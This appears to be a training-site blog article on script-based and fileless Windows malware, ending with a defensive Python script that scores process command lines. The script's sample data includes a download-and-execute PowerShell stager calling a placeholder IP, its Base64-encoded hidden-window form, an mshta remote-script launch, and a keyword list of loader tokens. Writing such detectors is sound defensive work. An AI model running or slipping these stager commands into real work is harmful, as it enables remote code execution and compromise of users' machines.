Script-Based Malware: A New Attacker Trend on Internet Explorer

Over the past few months, sophisticated script-based malware has been delivered through Internet Explorer (IE) browser exploits to infect Windows Operating System (OS) users. When you hear the word “script”, you probably think of either a movie script or JavaScript. Most of us never see a movie script, but JavaScript is far more visible: it is one of the many scripting languages programmers commonly use to add features to websites. Unfortunately, cybercriminals are leveraging that popularity too, using scripting techniques to make their attacks more effective, and they are creating script-based malware now more than ever. Do cyberattacks and cybersecurity intrigue you? It’s time to enroll in cybersecurity training and become a cybersecurity analyst.

What you will learn in this blog

  • What is Script-Based Malware?
  • Script-based techniques
  • Why is it popular?
  • What can you do to guard your devices against script-based malware? 
  • Conclusion

Let’s take a look at why script-based malware has increased so dramatically over the past two years.

What is Script-Based Malware?

Cybercriminals traditionally look for ways to get a malicious file installed on your computer, and a file on disk is exactly what signature-based antivirus is built to catch. A fileless attack takes a different route: instead of dropping its own executable, it activates tools, software and applications that are already built into the operating system (script hosts such as PowerShell, Windows Script Host and WMI) and runs its malicious logic from memory, so there is little on disk to scan. Script-based malware is usually placed in the same category because it does not drop a portable executable (PE) file; it piggybacks on legitimate script interpreters, performing malicious activity while those legitimate programs continue to run. Because the payload lives in memory rather than in a file, it can remain undetected by antivirus software that works well against other malware types only because it recognizes the traditional footprint of a file signature.

Script-based techniques

Script-based techniques are not always fileless, but they are still challenging to detect. Two well-known examples are Operation Cobalt Kitty and SamSam ransomware; both campaigns used techniques normally associated with fileless malware. Here is a list of examples of script-based malware used to infect Windows OS users:

  • SamSam ransomware

SamSam is perceived as semi-fileless. Its ransomware payload is stored encrypted and is only decrypted at run time by an initial launcher script, so without that script (and the password it is given) the payload cannot be analyzed, and obtaining a sample of the decrypted payload code is elusive. In practice, the only way to capture a sample for analysis is to witness the attack while it occurs. SamSam is also continually evolving, which makes attacks like these difficult to detect and protect against. In addition, SamSam requires the involvement of its operator, who has to enter a password: to run, the operator supplies the payload password or the disk decryption code. That means it does not spread automatically like other malware, which makes it well suited to single-purpose, targeted attacks.

  • Operation Cobalt Kitty

Operation Cobalt Kitty is an instance of a fileless attack in which the attackers spent nearly six months using malicious PowerShell to target an Asian corporation. More than 40 PCs and servers were compromised, with the initial foothold gained through a spear-phishing email.

  • JScript Remote Access Trojan (RAT)

A JScript RAT first establishes persistence on the target system and then opens an encoded network connection back to the attacker. From that point the attacker can run arbitrary commands on the target machine and potentially take full control of it.

  • AutoIT downloader 

The AutoIT downloader uses the language’s built-in network and scripting functions to download and execute further malware, so it can be used to infect targeted systems with ransomware, spyware and other payloads.

Why is it popular?

Scripting languages were originally designed to automate and simplify everyday tasks in the Windows environment, so they come with plenty of functions that wrap calls to the Windows API. Thanks to those functions, opening a network connection or interacting with the Windows environment is simple for an attacker. Scripting languages are also higher-level than C or C++, which makes them easier for attackers to learn and more accessible. With just a few lines of code, an attacker can build a working and flexible malicious program with features such as network connectivity, persistence on the targeted system and command execution, which also makes such tools easy to sell to other eager hackers. Evasion is probably the main reason behind this tactic’s popularity: scripts are easy to obfuscate and therefore hard to detect with signatures. The scripting languages these attackers use include JavaScript, VBScript, PHP, PowerShell and others. Alongside much other malware, security researchers have seen Bartallex, Kovter, Nemucod and W97/Downloader use scripts to deliver malicious payloads to victims’ devices. In 2016, for example, Locky was spread using multiple obfuscated layers of JavaScript, and fileless malware was seen being executed with the aid of PowerShell scripts.

What can you do to guard your devices against script-based malware? 

The best way to protect your devices from script-based malware is to stop infections before they happen. However, the legacy antivirus solutions that organizations once relied on no longer get the job done on their own, and next-generation endpoint security will need to be implemented. These so-called endpoint detection and response (EDR) solutions are based on continuous, real-time monitoring of phishing emails, incoming and outgoing network traffic, and unwanted activity in built-in tools such as WMI and PowerShell. Because fileless attacks very often rely on human weakness, analyzing user and system behavior is central to defending against them. Critical best practices for individuals include:

  • Being wary of downloading and installing apps.
  • Keeping up-to-date with software applications and security patches.
  • Watching out for phishing emails.
  • Updating browsers.
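
The two points made above, that scripts are popular with attackers because obfuscation (for example a Base64-encoded PowerShell command) defeats simple signatures, and that the defender’s answer is to monitor what built-in tools such as PowerShell and the Windows Script Host are actually being asked to run, can be shown together in one small triage script. The Python below is an added example written for this article, not code from the original page or from any product it mentions. It runs over a few constructed process command lines (the kind an EDR or Sysmon process-creation event records), decodes any -EncodedCommand argument (Base64 of UTF-16LE text) so the hidden content can be inspected, and scores each line on indicators described in the text. The indicator list, weights and threshold are illustrative assumptions, and 198.51.100.7 is a documentation-range address, not a real host.

```python
"""Triage of Windows script-host command lines.

Added example with constructed data. Decodes PowerShell -EncodedCommand
arguments (Base64 of UTF-16LE text) and scores each command line on the
indicators discussed in the article. Weights and threshold are assumptions.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Built-in Windows binaries that run scripts or script-like payloads.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "pwsh.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe"}
WSH_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Markers that a script was launched from a user-writable staging directory.
USER_STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\downloads\\")

# Substrings common in script loaders (one point each), matched on word
# boundaries so that e.g. "iex" does not fire on "iexplore.exe".
SUSPICIOUS_TOKENS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
    "iex", "invoke-expression", "frombase64string", "-nop", "-w hidden",
    "-windowstyle hidden", "bypass", "wscript.shell", "msxml2.xmlhttp",
    "adodb.stream", "schtasks", "currentversion\\run",
)
_TOKEN_RES = {t: re.compile(r"(?<![a-z0-9])" + re.escape(t) + r"(?![a-z0-9])")
              for t in SUSPICIOUS_TOKENS}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
_ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                     re.IGNORECASE)
_SCRIPT_EXT_RE = re.compile(r"\.(?:js|jse|vbs|vbe|wsf|wsh|hta)(?=[\s\"']|$)",
                            re.IGNORECASE)


@dataclass
class Verdict:
    command_line: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def image_name(cmdline: str) -> str:
    """Lower-case executable name at the head of a command line."""
    head = cmdline.strip()
    head = head[1:].split('"', 1)[0] if head.startswith('"') else head.split(None, 1)[0]
    return head.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def score_command_line(cmdline: str) -> Verdict:
    """Score one process command line; a higher score is more suspicious."""
    v = Verdict(command_line=cmdline)
    image = image_name(cmdline)
    text = cmdline.lower()

    if image in SCRIPT_HOSTS:
        v.score += 2
        v.reasons.append(f"script host: {image}")
    if image in WSH_HOSTS and _SCRIPT_EXT_RE.search(cmdline):
        v.score += 1
        v.reasons.append("script file handed to a script host")

    v.decoded = decode_encoded_command(cmdline)
    if v.decoded is not None:
        v.score += 3
        v.reasons.append("-EncodedCommand payload decoded")
        text += " " + v.decoded.lower()  # score the hidden content as well

    if image in SCRIPT_HOSTS and re.search(r"https?://", text):
        v.score += 2
        v.reasons.append("remote script location")
    if any(marker in text for marker in USER_STAGING_DIRS):
        v.score += 1
        v.reasons.append("launched from user staging directory")
    for token, pattern in _TOKEN_RES.items():
        if pattern.search(text):
            v.score += 1
            v.reasons.append(f"token: {token}")
    return v


def triage(command_lines: List[str], threshold: int = 4) -> List[Verdict]:
    """Return verdicts at or above threshold, most suspicious first."""
    hits = [v for v in map(score_command_line, command_lines) if v.score >= threshold]
    return sorted(hits, key=lambda v: v.score, reverse=True)


# Constructed sample telemetry (process-creation CommandLine fields).
# 198.51.100.7 is a documentation-range address, not a real host.
STAGER_TEXT = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/s.ps1")'
ENCODED_STAGER = base64.b64encode(STAGER_TEXT.encode("utf-16-le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\explorer.exe",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly_backup.ps1",
    '"C:\\Windows\\System32\\wscript.exe" //B //Nologo '
    "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice_2941.js",
    f"powershell.exe -nop -w hidden -enc {ENCODED_STAGER}",
    "C:\\Windows\\System32\\mshta.exe http://198.51.100.7/login.hta",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_COMMAND_LINES):
        print(f"[{v.score:>2}] {image_name(v.command_line)}: {'; '.join(v.reasons)}")
        if v.decoded:
            print(f"      decoded: {v.decoded}")
```

Run as a script, it flags the encoded PowerShell stager, the mshta.exe launch of a remote .hta and the wscript.exe run of a .js file from a Temp folder, while the administrator’s backup script stays below the threshold. The decode step is the important one: a signature on the visible command line sees only Base64, but once the UTF-16LE text is recovered the download-and-execute pattern is plain, which is exactly why monitoring what the script host is asked to run beats scanning files on disk for this class of malware.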

Conclusion

In this article, we looked at how attackers use scripts to carry out malicious activity on target Windows machines. These scripts don’t reinvent the wheel, but they offer attackers flexibility and accessibility: as the examples above show, they let attackers execute commands and potentially take full control of target machines, which is a strong incentive to choose this approach. Infection risk is much lower for organizations with skilled cybersecurity professionals and up-to-date Windows hosts that follow security best practices for safe web browsing. Cyber threats have evolved, and so have we!